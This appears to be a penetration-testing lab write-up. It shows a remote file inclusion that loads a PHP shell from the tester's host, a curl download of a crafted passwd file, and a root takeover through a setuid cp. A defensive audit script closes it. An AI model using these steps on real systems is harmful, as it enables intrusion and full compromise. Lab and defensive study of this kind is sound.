10.11.1.35

RFI through the `page` parameter, found by manual probing. OS reverse shell, then privilege escalation through SUID `cp`.

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
```

A really nice PHP shell, which can be used to spawn both a PHP-based shell and an OS-level shell:

http://10.11.1.35/section.php?page=http://192.168.119.129:80/phpshell.php

```
linpeas.sh
shadow
shell.elf
rm shadow
rm: cannot remove 'shadow': Operation not permitted

ls
linpeas.sh
shadow
shell.elf

curl "http://192.168.119.129:80/passwd" -o passwd
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   979  100   979    0     0   8770      0 --:--:-- --:--:-- --:--:--  8819
ls
linpeas.sh
passwd
shadow
shell.elf
cp passwd /etc/passwd

tail /etc/passwd
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

su chiya
Password: pass123
ls
linpeas.sh
passwd
shadow
shell.elf
whoami
root

cd /root
ls
anaconda-ks.cfg
proof.txt
cat proof.txt
99d8f4f10cf80eed5cb67e73e8b60a3d
```
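A defender-side audit for the two conditions this escalation depended on, as an added example that is not part of the original notes: a setuid bit on `cp`, and an `/etc/passwd` entry with UID 0 and an inline password hash. The function names `audit_passwd`, `suid_writers` and `sample_passwd` are hypothetical, and the sample input is constructed from lines shown in the session above.

```shell
#!/bin/sh
# Added audit example; not code from the original notes.

# audit_passwd FILE: one finding per line for a passwd(5)-format file.
# FILE may be "-" to read standard input.
audit_passwd() {
    awk -F: '
        $0 == "" || /^#/ { next }
        # UID 0 belongs to root only; any other name is a second superuser.
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        # An empty field means the account needs no password at all.
        $2 == "" { print "EMPTY_PASSWORD " $1 }
        # With shadow passwords the field is "x" (or "*", "!", "!!" when
        # locked). A crypt(3) string here is honoured directly by su.
        $2 != "" && $2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" {
            print "INLINE_HASH " $1
        }
    ' "$1"
}

# suid_writers PATH...: print each path that carries the setuid bit.
# A setuid-root copy utility lets any local user overwrite root-owned files.
suid_writers() {
    for f in "$@"; do
        [ -u "$f" ] && printf 'SUID %s\n' "$f"
    done
    return 0
}

# Constructed sample: three lines in the shape of the tail output above.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
EOF
}

# With a file argument, audit it; with none, audit the constructed sample.
if [ "$#" -gt 0 ]; then
    audit_passwd "$1"
else
    sample_passwd | audit_passwd -
fi
# The cp locations checked here are assumptions for a CentOS-style layout.
suid_writers /usr/bin/cp /bin/cp
```

On a host in its default state both checks print nothing; the fix for a flagged `cp` is `chmod u-s` on the binary.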
